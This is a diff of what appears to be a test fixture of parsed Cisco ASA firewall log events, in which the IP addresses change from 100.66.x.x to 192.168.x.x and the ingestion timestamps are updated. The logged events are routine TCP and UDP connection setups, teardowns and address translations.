@@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111752702Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:31:36.363807400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111754358Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:31:36.363812200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111756037Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:31:36.363818300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111757714Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:31:36.363823700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111759363Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": "2021-12-09T13:31:36.363828400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111761031Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:31:36.363832300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111762647Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:31:36.363836200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111764277Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:31:36.363841200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111765940Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:31:36.363845900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111820442Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:31:36.363851500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111823975Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:31:36.363855800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111826181Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:31:36.363861100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111828200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:31:36.363865600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111830107Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:31:36.363869300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111831796Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:31:36.363873700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111833539Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:31:36.363878700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111835195Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:31:36.363882900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111836924Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:31:36.363887500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111838570Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:31:36.363892300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111840310Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:31:36.363896900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111841971Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:31:36.363901600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111843694Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:31:36.363906700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111845342Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:31:36.363910500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111847012Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:31:36.363915300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111848640Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:31:36.363920Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111850268Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363925300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111851948Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:31:36.363929500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111853547Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:31:36.363934Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", 
